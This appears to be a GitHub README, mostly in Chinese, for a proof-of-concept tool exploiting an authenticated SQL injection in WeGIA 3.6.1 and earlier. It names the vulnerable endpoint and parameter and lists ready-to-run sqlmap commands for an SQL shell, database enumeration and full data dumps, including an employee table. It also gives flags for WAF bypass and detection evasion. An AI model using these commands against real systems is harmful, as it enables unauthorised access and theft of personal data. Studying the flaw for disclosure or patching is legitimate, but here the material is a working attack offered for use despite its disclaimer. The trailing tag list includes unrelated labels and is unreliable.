Ch35h1r3c47/CVE-2026-23723-POC

GitHub: Ch35h1r3c47/CVE-2026-23723-POC

针对 WeGIA 系统认证型 SQL 注入漏洞的 sqlmap 请求文件自动生成工具。

Stars: 3 | Forks: 1

# CVE-2026-23723 PoC - WeGIA 认证 SQL 注入漏洞利用辅助工具 **WeGIA ≤ 3.6.1 中的认证型报错 SQL 注入** **GHSA-xfmp-2hf9-gfjp** | [官方公告](https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xfmp-2hf9-gfjp) **PoC 原作者 / 报告者**: [ViniCastro2001](https://github.com/ViniCastro2001) **GHSA 发布者**: nilsonLazarin (项目维护者) 此轻量级 Python 脚本可自动化执行: - 使用提供的凭据登录 WeGIA 系统 - 提取有效的 PHP 会话 Cookie - 生成兼容 sqlmap 的请求文件(注入点标记为 `id_memorando=1*`) - 输出可直接运行的 sqlmap 命令,用于枚举、交互式 Shell 和数据导出 ### 功能特性 - 尝试多种常见的登录路径和表单字段名称,以提高兼容性 - 生成 sqlmap 请求文件 (.req) - 提供可直接复制粘贴的 sqlmap 命令,用于: - 交互式类 MySQL Shell (`--sql-shell`) - 数据库/表枚举 - 定向表导出或全库导出 ### 环境要求 - Python 3.x - `requests` 库(大多数渗透测试环境通常已安装) - 已安装 [sqlmap](https://github.com/sqlmapproject/sqlmap) 并添加至 PATH ### 安装 ``` git clone https://github.com/Ch35h1r3c47/CVE-2026-23723-POC.git cd CVE-2026-23723-POC ``` ### 使用方法 ``` # 推荐:交互式密码提示 python CVE-2026-23723.py --url http://target.com -u admin # 直接提供密码 python CVE-2026-23723.py --url http://target.com -u admin -p wegia # 自定义输出文件 python CVE-2026-23723.py --url http://target.com -u admin -p wegia --output custom.req ``` 成功运行后,该脚本将: 尝试登录 生成 wegia_sqlmap.req(或您自定义的文件名) 显示可直接使用的 sqlmap 命令 ### 示例生成的命令: ``` # 1. 交互式 MySQL-like shell(最推荐) sqlmap -r wegia_sqlmap.req --sql-shell --batch --dbms=mariadb # 2. 显示当前及所有数据库 sqlmap -r wegia_sqlmap.req --current-db --dbs --batch # 3. 列出 wegia 数据库中的表 sqlmap -r wegia_sqlmap.req -D wegia --tables --batch # 4. 导出特定表(示例:funcionario) sqlmap -r wegia_sqlmap.req -D wegia -T funcionario --dump --threads=2 --batch # 5. 导出整个 wegia 数据库(请注意!) sqlmap -r wegia_sqlmap.req -D wegia --dump-all --threads=3 --batch --output-dir=./dump Optional sqlmap flags: --proxy=http://127.0.0.1:8080 (through Burp/ZAP) --tamper=space2comment,randomcase (basic WAF bypass) --delay=1 (slow down to avoid detection) ``` 如果自动登录失败 通过浏览器手动登录 → 复制完整的 Cookie 头 → 直接运行 sqlmap: ``` sqlmap -u "http://target.com/controle/control.php?nomeClasse=Atendido_ocorrenciaControle&metodo=listarTodosComAnexo&id_memorando=*" \ --cookie="PHPSESSID=xxxxxxxx; other_cookie=yyy" \ --sql-shell --batch ``` 法律声明 本 PoC 仅供教育和授权渗透测试目的使用。 未经授权对任何系统使用本工具是非法的,并受到禁止。 作者和贡献者不对滥用行为或造成的任何损害承担责任。 参考信息 GHSA-xfmp-2hf9-gfjp CVE-2026-23723
标签:CISA项目, CVE-2026-23723, GHSA-xfmp-2hf9-gfjp, PE 加载器, PHP 会话利用, PoC 验证, Python, RCE 辅助, sqlmap 辅助, SQL 注入, Web 安全, WeGIA, 恶意脚本, 数据库攻击, 无后门, 漏洞复现, 网络安全, 自动化攻击, 认证后漏洞, 逆向工具, 错误型注入, 隐私保护